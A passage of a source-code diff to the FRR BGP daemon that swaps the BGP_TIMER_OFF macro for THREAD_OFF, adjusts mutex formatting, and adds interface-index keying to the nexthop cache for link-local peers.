- BGP_TIMER_OFF(from_peer->t_delayopen);
- BGP_TIMER_OFF(from_peer->t_connect_check_r);
- BGP_TIMER_OFF(from_peer->t_connect_check_w);
- BGP_TIMER_OFF(from_peer->t_process_packet);
+ THREAD_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_connect_check_r);
+ THREAD_OFF(peer->t_connect_check_w);
+ THREAD_OFF(from_peer->t_routeadv);
+ THREAD_OFF(from_peer->t_connect);
+ THREAD_OFF(from_peer->t_delayopen);
+ THREAD_OFF(from_peer->t_connect_check_r);
+ THREAD_OFF(from_peer->t_connect_check_w);
+ THREAD_OFF(from_peer->t_process_packet);
/*
* At this point in time, it is possible that there are packets pending
* on various buffers. Those need to be transferred or dropped,
* otherwise we'll get spurious failures during session establishment.
*/
- frr_with_mutex(&peer->io_mtx, &from_peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx, &from_peer->io_mtx) {
fd = peer->fd;
peer->fd = from_peer->fd;
from_peer->fd = fd;
@@ -365,23 +365,23 @@ void bgp_timer_set(struct peer *peer)
inactive. All other timer must be turned off */
if (BGP_PEER_START_SUPPRESSED(peer) || !peer_active(peer)
|| peer->bgp->vrf_id == VRF_UNKNOWN) {
- BGP_TIMER_OFF(peer->t_start);
+ THREAD_OFF(peer->t_start);
} else {
BGP_TIMER_ON(peer->t_start, bgp_start_timer,
peer->v_start);
}
- BGP_TIMER_OFF(peer->t_connect);
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_holdtime);
bgp_keepalives_off(peer);
- BGP_TIMER_OFF(peer->t_routeadv);
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_delayopen);
break;
case Connect:
/* After start timer is expired, the peer moves to Connect
status. Make sure start timer is off and connect timer is
on. */
- BGP_TIMER_OFF(peer->t_start);
+ THREAD_OFF(peer->t_start);
if (CHECK_FLAG(peer->flags, PEER_FLAG_TIMER_DELAYOPEN))
BGP_TIMER_ON(peer->t_connect, bgp_connect_timer,
(peer->v_delayopen + peer->v_connect));
@@ -389,19 +389,19 @@ void bgp_timer_set(struct peer *peer)
BGP_TIMER_ON(peer->t_connect, bgp_connect_timer,
peer->v_connect);
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
bgp_keepalives_off(peer);
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
break;
case Active:
/* Active is waiting connection from remote peer. And if
connect timer is expired, change status to Connect. */
- BGP_TIMER_OFF(peer->t_start);
+ THREAD_OFF(peer->t_start);
/* If peer is passive mode, do not set connect timer. */
if (CHECK_FLAG(peer->flags, PEER_FLAG_PASSIVE)
|| CHECK_FLAG(peer->sflags, PEER_STATUS_NSF_WAIT)) {
- BGP_TIMER_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_connect);
} else {
if (CHECK_FLAG(peer->flags, PEER_FLAG_TIMER_DELAYOPEN))
BGP_TIMER_ON(
@@ -411,56 +411,56 @@ void bgp_timer_set(struct peer *peer)
BGP_TIMER_ON(peer->t_connect, bgp_connect_timer,
peer->v_connect);
}
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
bgp_keepalives_off(peer);
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
break;
case OpenSent:
/* OpenSent status. */
- BGP_TIMER_OFF(peer->t_start);
- BGP_TIMER_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_start);
+ THREAD_OFF(peer->t_connect);
if (peer->v_holdtime != 0) {
BGP_TIMER_ON(peer->t_holdtime, bgp_holdtime_timer,
peer->v_holdtime);
} else {
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
}
bgp_keepalives_off(peer);
- BGP_TIMER_OFF(peer->t_routeadv);
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_delayopen);
break;
case OpenConfirm:
/* OpenConfirm status. */
- BGP_TIMER_OFF(peer->t_start);
- BGP_TIMER_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_start);
+ THREAD_OFF(peer->t_connect);
/* If the negotiated Hold Time value is zero, then the Hold Time
timer and KeepAlive timers are not started. */
if (peer->v_holdtime == 0) {
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
bgp_keepalives_off(peer);
} else {
BGP_TIMER_ON(peer->t_holdtime, bgp_holdtime_timer,
peer->v_holdtime);
bgp_keepalives_on(peer);
}
- BGP_TIMER_OFF(peer->t_routeadv);
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_delayopen);
break;
case Established:
/* In Established status start and connect timer is turned
off. */
- BGP_TIMER_OFF(peer->t_start);
- BGP_TIMER_OFF(peer->t_connect);
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_start);
+ THREAD_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_delayopen);
/* Same as OpenConfirm, if holdtime is zero then both holdtime
and keepalive must be turned off. */
if (peer->v_holdtime == 0) {
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
bgp_keepalives_off(peer);
} else {
BGP_TIMER_ON(peer->t_holdtime, bgp_holdtime_timer,
@@ -469,22 +469,22 @@ void bgp_timer_set(struct peer *peer)
}
break;
case Deleted:
- BGP_TIMER_OFF(peer->t_gr_restart);
- BGP_TIMER_OFF(peer->t_gr_stale);
+ THREAD_OFF(peer->t_gr_restart);
+ THREAD_OFF(peer->t_gr_stale);
FOREACH_AFI_SAFI (afi, safi)
- BGP_TIMER_OFF(peer->t_llgr_stale[afi][safi]);
+ THREAD_OFF(peer->t_llgr_stale[afi][safi]);
- BGP_TIMER_OFF(peer->t_pmax_restart);
- BGP_TIMER_OFF(peer->t_refresh_stalepath);
+ THREAD_OFF(peer->t_pmax_restart);
+ THREAD_OFF(peer->t_refresh_stalepath);
/* fallthru */
case Clearing:
- BGP_TIMER_OFF(peer->t_start);
- BGP_TIMER_OFF(peer->t_connect);
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_start);
+ THREAD_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_holdtime);
bgp_keepalives_off(peer);
- BGP_TIMER_OFF(peer->t_routeadv);
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_delayopen);
break;
case BGP_STATUS_MAX:
flog_err(EC_LIB_DEVELOPMENT,
@@ -516,7 +516,7 @@ static void bgp_connect_timer(struct thread *thread)
peer = THREAD_ARG(thread);
/* stop the DelayOpenTimer if it is running */
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_delayopen);
assert(!peer->t_write);
assert(!peer->t_read);
@@ -647,7 +647,7 @@ static void bgp_graceful_restart_timer_off(struct peer *peer)
return;
UNSET_FLAG(peer->sflags, PEER_STATUS_NSF_WAIT);
- BGP_TIMER_OFF(peer->t_gr_stale);
+ THREAD_OFF(peer->t_gr_stale);
if (peer_dynamic_neighbor(peer) &&
!(CHECK_FLAG(peer->flags, PEER_FLAG_DELETE))) {
@@ -965,7 +965,7 @@ void bgp_start_routeadv(struct bgp *bgp)
for (ALL_LIST_ELEMENTS(bgp->peer, node, nnode, peer)) {
if (!peer_established(peer))
continue;
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
BGP_TIMER_ON(peer->t_routeadv, bgp_routeadv_timer, 0);
}
}
@@ -985,7 +985,7 @@ void bgp_adjust_routeadv(struct peer *peer)
* different
* duration and schedule write thread immediately.
*/
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
peer->synctime = bgp_clock();
/* If suppress fib pending is enabled, route is advertised to
@@ -1017,7 +1017,7 @@ void bgp_adjust_routeadv(struct peer *peer)
*/
diff = difftime(nowtime, peer->last_update);
if (diff > (double)peer->v_routeadv) {
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
BGP_TIMER_ON(peer->t_routeadv, bgp_routeadv_timer, 0);
return;
}
@@ -1044,7 +1044,7 @@ void bgp_adjust_routeadv(struct peer *peer)
remain = peer->v_routeadv;
diff = peer->v_routeadv - diff;
if (diff <= (double)remain) {
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
BGP_TIMER_ON(peer->t_routeadv, bgp_routeadv_timer, diff);
}
}
@@ -1401,7 +1401,7 @@ int bgp_stop(struct peer *peer)
/* graceful restart */
if (peer->t_gr_stale) {
- BGP_TIMER_OFF(peer->t_gr_stale);
+ THREAD_OFF(peer->t_gr_stale);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP graceful restart stalepath timer stopped",
@@ -1431,7 +1431,7 @@ int bgp_stop(struct peer *peer)
/* Stop route-refresh stalepath timer */
if (peer->t_refresh_stalepath) {
- BGP_TIMER_OFF(peer->t_refresh_stalepath);
+ THREAD_OFF(peer->t_refresh_stalepath);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
@@ -1464,8 +1464,7 @@ int bgp_stop(struct peer *peer)
/* There is no pending EOR message */
if (gr_info->eor_required == 0) {
- BGP_TIMER_OFF(
- gr_info->t_select_deferral);
+ THREAD_OFF(gr_info->t_select_deferral);
gr_info->eor_received = 0;
}
}
@@ -1494,14 +1493,14 @@ int bgp_stop(struct peer *peer)
THREAD_OFF(peer->t_connect_check_w);
/* Stop all timers. */
- BGP_TIMER_OFF(peer->t_start);
- BGP_TIMER_OFF(peer->t_connect);
- BGP_TIMER_OFF(peer->t_holdtime);
- BGP_TIMER_OFF(peer->t_routeadv);
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_start);
+ THREAD_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_delayopen);
/* Clear input and output buffer. */
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
if (peer->ibuf)
stream_fifo_clean(peer->ibuf);
if (peer->obuf)
@@ -1993,7 +1992,7 @@ static int bgp_fsm_holdtime_expire(struct peer *peer)
static int bgp_fsm_delayopen_timer_expire(struct peer *peer)
{
/* Stop the DelayOpenTimer */
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_delayopen);
/* Send open message to peer */
bgp_open_send(peer);
@@ -2203,7 +2202,7 @@ static int bgp_establish(struct peer *peer)
else {
UNSET_FLAG(peer->sflags, PEER_STATUS_NSF_MODE);
if (peer->t_gr_stale) {
- BGP_TIMER_OFF(peer->t_gr_stale);
+ THREAD_OFF(peer->t_gr_stale);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP graceful restart stalepath timer stopped",
@@ -2212,7 +2211,7 @@ static int bgp_establish(struct peer *peer)
}
if (peer->t_gr_restart) {
- BGP_TIMER_OFF(peer->t_gr_restart);
+ THREAD_OFF(peer->t_gr_restart);
if (bgp_debug_neighbor_events(peer))
zlog_debug("%pBP graceful restart timer stopped", peer);
}
@@ -2228,7 +2227,7 @@ static int bgp_establish(struct peer *peer)
*/
FOREACH_AFI_SAFI (afi, safi) {
if (peer->t_llgr_stale[afi][safi]) {
- BGP_TIMER_OFF(peer->t_llgr_stale[afi][safi]);
+ THREAD_OFF(peer->t_llgr_stale[afi][safi]);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP Long-lived stale timer stopped for afi/safi: %d/%d",
@@ -2273,7 +2272,7 @@ static int bgp_establish(struct peer *peer)
* of read-only mode.
*/
if (!bgp_update_delay_active(peer->bgp)) {
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
BGP_TIMER_ON(peer->t_routeadv, bgp_routeadv_timer, 0);
}
@@ -2309,14 +2308,14 @@ static int bgp_establish(struct peer *peer)
/* Keepalive packet is received. */
static int bgp_fsm_keepalive(struct peer *peer)
{
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
return 0;
}
/* Update packet is received. */
static int bgp_fsm_update(struct peer *peer)
{
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
return 0;
}
@@ -2358,13 +2357,13 @@ void bgp_fsm_nht_update(struct peer *peer, bool has_valid_nexthops)
break;
case Connect:
if (!has_valid_nexthops) {
- BGP_TIMER_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_connect);
BGP_EVENT_ADD(peer, TCP_fatal_error);
}
break;
case Active:
if (has_valid_nexthops) {
- BGP_TIMER_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_connect);
BGP_EVENT_ADD(peer, ConnectRetry_timer_expired);
}
break;
diff --git a/bgpd/bgp_fsm.h b/bgpd/bgp_fsm.h
index 765a5aec5e..aaf6c480b2 100644
--- a/bgpd/bgp_fsm.h
+++ b/bgpd/bgp_fsm.h
@@ -29,11 +29,6 @@
thread_add_timer(bm->master, (F), peer, (V), &(T)); \
} while (0)
-#define BGP_TIMER_OFF(T) \
- do { \
- THREAD_OFF((T)); \
- } while (0)
-
#define BGP_EVENT_ADD(P, E) \
do { \
if ((P)->status != Deleted) \
diff --git a/bgpd/bgp_io.c b/bgpd/bgp_io.c
index 75d34a84e0..aba28fa504 100644
--- a/bgpd/bgp_io.c
+++ b/bgpd/bgp_io.c
@@ -134,7 +134,7 @@ static void bgp_process_writes(struct thread *thread)
struct frr_pthread *fpt = bgp_pth_io;
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
status = bgp_write(peer);
reschedule = (stream_fifo_head(peer->obuf) != NULL);
}
@@ -188,7 +188,7 @@ static void bgp_process_reads(struct thread *thread)
struct frr_pthread *fpt = bgp_pth_io;
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
status = bgp_read(peer, &code);
}
@@ -247,7 +247,7 @@ static void bgp_process_reads(struct thread *thread)
stream_set_endp(pkt, pktsize);
frrtrace(2, frr_bgp, packet_read, peer, pkt);
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
stream_fifo_push(peer->ibuf, pkt);
}
diff --git a/bgpd/bgp_keepalives.c b/bgpd/bgp_keepalives.c
index 86202a0e3d..158f163358 100644
--- a/bgpd/bgp_keepalives.c
+++ b/bgpd/bgp_keepalives.c
@@ -252,7 +252,7 @@ void bgp_keepalives_on(struct peer *peer)
*/
assert(peerhash_mtx);
- frr_with_mutex(peerhash_mtx) {
+ frr_with_mutex (peerhash_mtx) {
holder.peer = peer;
if (!hash_lookup(peerhash, &holder)) {
struct pkat *pkat = pkat_new(peer);
@@ -280,7 +280,7 @@ void bgp_keepalives_off(struct peer *peer)
*/
assert(peerhash_mtx);
- frr_with_mutex(peerhash_mtx) {
+ frr_with_mutex (peerhash_mtx) {
holder.peer = peer;
struct pkat *res = hash_release(peerhash, &holder);
if (res) {
@@ -293,7 +293,7 @@ void bgp_keepalives_off(struct peer *peer)
void bgp_keepalives_wake(void)
{
- frr_with_mutex(peerhash_mtx) {
+ frr_with_mutex (peerhash_mtx) {
pthread_cond_signal(peerhash_cond);
}
}
diff --git a/bgpd/bgp_mplsvpn.c b/bgpd/bgp_mplsvpn.c
index 52180b3e48..7b8f0df2e2 100644
--- a/bgpd/bgp_mplsvpn.c
+++ b/bgpd/bgp_mplsvpn.c
@@ -1472,7 +1472,7 @@ void vpn_leak_from_vrf_update_all(struct bgp *to_bgp, struct bgp *from_bgp,
}
}
-static void
+static bool
vpn_leak_to_vrf_update_onevrf(struct bgp *to_bgp, /* to */
struct bgp *from_bgp, /* from */
struct bgp_path_info *path_vpn) /* route */
@@ -1498,7 +1498,7 @@ vpn_leak_to_vrf_update_onevrf(struct bgp *to_bgp, /* to */
if (!vpn_leak_from_vpn_active(to_bgp, afi, &debugmsg)) {
if (debug)
zlog_debug("%s: skipping: %s", __func__, debugmsg);
- return;
+ return false;
}
/* Check for intersection of route targets */
@@ -1509,7 +1509,7 @@ vpn_leak_to_vrf_update_onevrf(struct bgp *to_bgp, /* to */
zlog_debug(
"from vpn (%s) to vrf (%s), skipping after no intersection of route targets",
from_bgp->name_pretty, to_bgp->name_pretty);
- return;
+ return false;
}
if (debug)
@@ -1604,7 +1604,7 @@ vpn_leak_to_vrf_update_onevrf(struct bgp *to_bgp, /* to */
to_bgp->vpn_policy[afi]
.rmap[BGP_VPN_POLICY_DIR_FROMVPN]
->name);
- return;
+ return false;
}
/*
* if route-map changed nexthop, don't nexthop-self on output
@@ -1674,13 +1674,15 @@ vpn_leak_to_vrf_update_onevrf(struct bgp *to_bgp, /* to */
leak_update(to_bgp, bn, new_attr, afi, safi, path_vpn, pLabels,
num_labels, src_vrf, &nexthop_orig, nexthop_self_flag,
debug);
+ return true;
}
-void vpn_leak_to_vrf_update(struct bgp *from_bgp, /* from */
+bool vpn_leak_to_vrf_update(struct bgp *from_bgp, /* from */
struct bgp_path_info *path_vpn) /* route */
{
struct listnode *mnode, *mnnode;
struct bgp *bgp;
+ bool leak_success = false;
int debug = BGP_DEBUG(vpn, VPN_LEAK_TO_VRF);
@@ -1692,9 +1694,11 @@ void vpn_leak_to_vrf_update(struct bgp *from_bgp, /* from */
if (!path_vpn->extra
|| path_vpn->extra->bgp_orig != bgp) { /* no loop */
- vpn_leak_to_vrf_update_onevrf(bgp, from_bgp, path_vpn);
+ leak_success |= vpn_leak_to_vrf_update_onevrf(
+ bgp, from_bgp, path_vpn);
}
}
+ return leak_success;
}
void vpn_leak_to_vrf_withdraw(struct bgp *from_bgp, /* from */
@@ -2487,7 +2491,7 @@ DEFUN (show_ip_bgp_vpn_rd,
IP_STR
BGP_STR
BGP_AFI_HELP_STR
- "Address Family modifier\n"
+ BGP_AF_MODIFIER_STR
"Display information for a route distinguisher\n"
"VPN Route Distinguisher\n"
"All VPN Route Distinguishers\n")
diff --git a/bgpd/bgp_mplsvpn.h b/bgpd/bgp_mplsvpn.h
index fcabb16435..c5cc7d4294 100644
--- a/bgpd/bgp_mplsvpn.h
+++ b/bgpd/bgp_mplsvpn.h
@@ -25,6 +25,7 @@
#include "bgpd/bgp_route.h"
#include "bgpd/bgp_rd.h"
#include "bgpd/bgp_zebra.h"
+#include "bgpd/bgp_vty.h"
#define MPLS_LABEL_IS_SPECIAL(label) ((label) <= MPLS_LABEL_EXTENSION)
#define MPLS_LABEL_IS_NULL(label) \
@@ -32,9 +33,7 @@
|| (label) == MPLS_LABEL_IPV6_EXPLICIT_NULL \
|| (label) == MPLS_LABEL_IMPLICIT_NULL)
-#define BGP_VPNVX_HELP_STR \
- "Address Family\n" \
- "Address Family\n"
+#define BGP_VPNVX_HELP_STR BGP_AF_STR BGP_AF_STR
#define V4_HEADER \
" Network Next Hop Metric LocPrf Weight Path\n"
@@ -70,7 +69,7 @@ extern void vpn_leak_to_vrf_withdraw_all(struct bgp *to_bgp, afi_t afi);
extern void vpn_leak_to_vrf_update_all(struct bgp *to_bgp, struct bgp *from_bgp,
afi_t afi);
-extern void vpn_leak_to_vrf_update(struct bgp *from_bgp,
+extern bool vpn_leak_to_vrf_update(struct bgp *from_bgp,
struct bgp_path_info *path_vpn);
extern void vpn_leak_to_vrf_withdraw(struct bgp *from_bgp,
@@ -233,8 +232,14 @@ static inline void vpn_leak_postchange(enum vpn_policy_direction direction,
if (!bgp_vpn)
return;
- if (direction == BGP_VPN_POLICY_DIR_FROMVPN)
- vpn_leak_to_vrf_update_all(bgp_vrf, bgp_vpn, afi);
+ if (direction == BGP_VPN_POLICY_DIR_FROMVPN) {
+ /* trigger a flush to re-sync with ADJ-RIB-in */
+ if (!CHECK_FLAG(bgp_vpn->af_flags[afi][SAFI_MPLS_VPN],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL))
+ bgp_clear_soft_in(bgp_vpn, afi, SAFI_MPLS_VPN);
+ else
+ vpn_leak_to_vrf_update_all(bgp_vrf, bgp_vpn, afi);
+ }
if (direction == BGP_VPN_POLICY_DIR_TOVPN) {
if (bgp_vrf->vpn_policy[afi].tovpn_label !=
diff --git a/bgpd/bgp_network.c b/bgpd/bgp_network.c
index da4cc03b66..9ecc2ae4e4 100644
--- a/bgpd/bgp_network.c
+++ b/bgpd/bgp_network.c
@@ -429,7 +429,7 @@ static void bgp_accept(struct thread *thread)
sockopt_tcp_mss_set(bgp_sock, peer1->tcp_mss);
bgp_fsm_change_status(peer1, Active);
- BGP_TIMER_OFF(
+ THREAD_OFF(
peer1->t_start); /* created in peer_create() */
if (peer_active(peer1)) {
@@ -558,7 +558,7 @@ static void bgp_accept(struct thread *thread)
}
bgp_peer_reg_with_nht(peer);
bgp_fsm_change_status(peer, Active);
- BGP_TIMER_OFF(peer->t_start); /* created in peer_create() */
+ THREAD_OFF(peer->t_start); /* created in peer_create() */
SET_FLAG(peer->sflags, PEER_STATUS_ACCEPT_PEER);
/* Make dummy peer until read Open packet. */
diff --git a/bgpd/bgp_nexthop.c b/bgpd/bgp_nexthop.c
index c6043807dd..e1fcc743ec 100644
--- a/bgpd/bgp_nexthop.c
+++ b/bgpd/bgp_nexthop.c
@@ -56,6 +56,11 @@ int bgp_nexthop_cache_compare(const struct bgp_nexthop_cache *a,
if (a->srte_color > b->srte_color)
return 1;
+ if (a->ifindex < b->ifindex)
+ return -1;
+ if (a->ifindex > b->ifindex)
+ return 1;
+
return prefix_cmp(&a->prefix, &b->prefix);
}
@@ -70,13 +75,15 @@ void bnc_nexthop_free(struct bgp_nexthop_cache *bnc)
}
struct bgp_nexthop_cache *bnc_new(struct bgp_nexthop_cache_head *tree,
- struct prefix *prefix, uint32_t srte_color)
+ struct prefix *prefix, uint32_t srte_color,
+ ifindex_t ifindex)
{
struct bgp_nexthop_cache *bnc;
bnc = XCALLOC(MTYPE_BGP_NEXTHOP_CACHE,
sizeof(struct bgp_nexthop_cache));
bnc->prefix = *prefix;
+ bnc->ifindex = ifindex;
bnc->srte_color = srte_color;
bnc->tree = tree;
LIST_INIT(&(bnc->paths));
@@ -106,7 +113,8 @@ void bnc_free(struct bgp_nexthop_cache *bnc)
}
struct bgp_nexthop_cache *bnc_find(struct bgp_nexthop_cache_head *tree,
- struct prefix *prefix, uint32_t srte_color)
+ struct prefix *prefix, uint32_t srte_color,
+ ifindex_t ifindex)
{
struct bgp_nexthop_cache bnc = {};
@@ -115,6 +123,7 @@ struct bgp_nexthop_cache *bnc_find(struct bgp_nexthop_cache_head *tree,
bnc.prefix = *prefix;
bnc.srte_color = srte_color;
+ bnc.ifindex = ifindex;
return bgp_nexthop_cache_find(tree, &bnc);
}
@@ -915,7 +924,7 @@ static int show_ip_bgp_nexthop_table(struct vty *vty, const char *name,
}
tree = import_table ? &bgp->import_check_table
: &bgp->nexthop_cache_table;
- bnc = bnc_find(tree[family2afi(nhop.family)], &nhop, 0);
+ bnc = bnc_find(tree[family2afi(nhop.family)], &nhop, 0, 0);
if (!bnc) {
vty_out(vty, "specified nexthop does not have entry\n");
return CMD_SUCCESS;
diff --git a/bgpd/bgp_nexthop.h b/bgpd/bgp_nexthop.h
index 16c2b6c65a..9d653ef4dc 100644
--- a/bgpd/bgp_nexthop.h
+++ b/bgpd/bgp_nexthop.h
@@ -152,12 +152,14 @@ extern bool bgp_nexthop_self(struct bgp *bgp, afi_t afi, uint8_t type,
struct bgp_dest *dest);
extern struct bgp_nexthop_cache *bnc_new(struct bgp_nexthop_cache_head *tree,
struct prefix *prefix,
- uint32_t srte_color);
+ uint32_t srte_color,
+ ifindex_t ifindex);
extern bool bnc_existing_for_prefix(struct bgp_nexthop_cache *bnc);
extern void bnc_free(struct bgp_nexthop_cache *bnc);
extern struct bgp_nexthop_cache *bnc_find(struct bgp_nexthop_cache_head *tree,
struct prefix *prefix,
- uint32_t srte_color);
+ uint32_t srte_color,
+ ifindex_t ifindex);
extern void bnc_nexthop_free(struct bgp_nexthop_cache *bnc);
extern const char *bnc_str(struct bgp_nexthop_cache *bnc, char *buf, int size);
extern void bgp_scan_init(struct bgp *bgp);
diff --git a/bgpd/bgp_nht.c b/bgpd/bgp_nht.c
index 3ab67a6181..e03e83db2c 100644
--- a/bgpd/bgp_nht.c
+++ b/bgpd/bgp_nht.c
@@ -84,9 +84,10 @@ static void bgp_unlink_nexthop_check(struct bgp_nexthop_cache *bnc)
if (LIST_EMPTY(&(bnc->paths)) && !bnc->nht_info) {
if (BGP_DEBUG(nht, NHT)) {
char buf[PREFIX2STR_BUFFER];
- zlog_debug("%s: freeing bnc %s(%u)(%s)", __func__,
+ zlog_debug("%s: freeing bnc %s(%d)(%u)(%s)", __func__,
bnc_str(bnc, buf, PREFIX2STR_BUFFER),
- bnc->srte_color, bnc->bgp->name_pretty);
+ bnc->ifindex, bnc->srte_color,
+ bnc->bgp->name_pretty);
}
/* only unregister if this is the last nh for this prefix*/
if (!bnc_existing_for_prefix(bnc))
@@ -113,17 +114,32 @@ void bgp_replace_nexthop_by_peer(struct peer *from, struct peer *to)
struct prefix pt;
struct bgp_nexthop_cache *bncp, *bnct;
afi_t afi;
+ ifindex_t ifindex = 0;
if (!sockunion2hostprefix(&from->su, &pp))
return;
+ /*
+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ if (from->conf_if && IN6_IS_ADDR_LINKLOCAL(&from->su.sin6.sin6_addr))
+ ifindex = from->su.sin6.sin6_scope_id;
+
afi = family2afi(pp.family);
- bncp = bnc_find(&from->bgp->nexthop_cache_table[afi], &pp, 0);
+ bncp = bnc_find(&from->bgp->nexthop_cache_table[afi], &pp, 0, ifindex);
if (!sockunion2hostprefix(&to->su, &pt))
return;
- bnct = bnc_find(&to->bgp->nexthop_cache_table[afi], &pt, 0);
+ /*
+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ ifindex = 0;
+ if (to->conf_if && IN6_IS_ADDR_LINKLOCAL(&to->su.sin6.sin6_addr))
+ ifindex = to->su.sin6.sin6_scope_id;
+ bnct = bnc_find(&to->bgp->nexthop_cache_table[afi], &pt, 0, ifindex);
if (bnct != bncp)
return;
@@ -137,11 +153,17 @@ void bgp_unlink_nexthop_by_peer(struct peer *peer)
struct prefix p;
struct bgp_nexthop_cache *bnc;
afi_t afi = family2afi(peer->su.sa.sa_family);
+ ifindex_t ifindex = 0;
if (!sockunion2hostprefix(&peer->su, &p))
return;
-
- bnc = bnc_find(&peer->bgp->nexthop_cache_table[afi], &p, 0);
+ /*
+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ if (afi == AFI_IP6 && IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
+ ifindex = peer->su.sin6.sin6_scope_id;
+ bnc = bnc_find(&peer->bgp->nexthop_cache_table[afi], &p, 0, ifindex);
if (!bnc)
return;
@@ -206,9 +228,18 @@ int bgp_find_or_add_nexthop(struct bgp *bgp_route, struct bgp *bgp_nexthop,
* Gather the ifindex for if up/down events to be
* tagged into this fun
*/
- if (afi == AFI_IP6
- && IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
+ if (afi == AFI_IP6 &&
+ IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr)) {
ifindex = peer->su.sin6.sin6_scope_id;
+ if (ifindex == 0) {
+ if (BGP_DEBUG(nht, NHT)) {
+ zlog_debug(
+ "%s: Unable to locate ifindex, waiting till we have one",
+ peer->conf_if);
+ }
+ return 0;
+ }
+ }
if (!sockunion2hostprefix(&peer->su, &p)) {
if (BGP_DEBUG(nht, NHT)) {
@@ -226,28 +257,27 @@ int bgp_find_or_add_nexthop(struct bgp *bgp_route, struct bgp *bgp_nexthop,
else
tree = &bgp_nexthop->nexthop_cache_table[afi];
- bnc = bnc_find(tree, &p, srte_color);
+ bnc = bnc_find(tree, &p, srte_color, ifindex);
if (!bnc) {
- bnc = bnc_new(tree, &p, srte_color);
+ bnc = bnc_new(tree, &p, srte_color, ifindex);
bnc->bgp = bgp_nexthop;
- bnc->ifindex = ifindex;
if (BGP_DEBUG(nht, NHT)) {
char buf[PREFIX2STR_BUFFER];
- zlog_debug("Allocated bnc %s(%u)(%s) peer %p",
+ zlog_debug("Allocated bnc %s(%d)(%u)(%s) peer %p",
bnc_str(bnc, buf, PREFIX2STR_BUFFER),
- bnc->srte_color, bnc->bgp->name_pretty,
- peer);
+ bnc->ifindex, bnc->srte_color,
+ bnc->bgp->name_pretty, peer);
}
} else {
if (BGP_DEBUG(nht, NHT)) {
char buf[PREFIX2STR_BUFFER];
zlog_debug(
- "Found existing bnc %s(%s) flags 0x%x ifindex %d #paths %d peer %p",
+ "Found existing bnc %s(%d)(%s) flags 0x%x ifindex %d #paths %d peer %p",
bnc_str(bnc, buf, PREFIX2STR_BUFFER),
- bnc->bgp->name_pretty, bnc->flags, bnc->ifindex,
- bnc->path_count, bnc->nht_info);
+ bnc->ifindex, bnc->bgp->name_pretty, bnc->flags,
+ bnc->ifindex, bnc->path_count, bnc->nht_info);
}
}
@@ -351,15 +381,21 @@ void bgp_delete_connected_nexthop(afi_t afi, struct peer *peer)
{
struct bgp_nexthop_cache *bnc;
struct prefix p;
+ ifindex_t ifindex = 0;
if (!peer)
return;
if (!sockunion2hostprefix(&peer->su, &p))
return;
-
+ /*
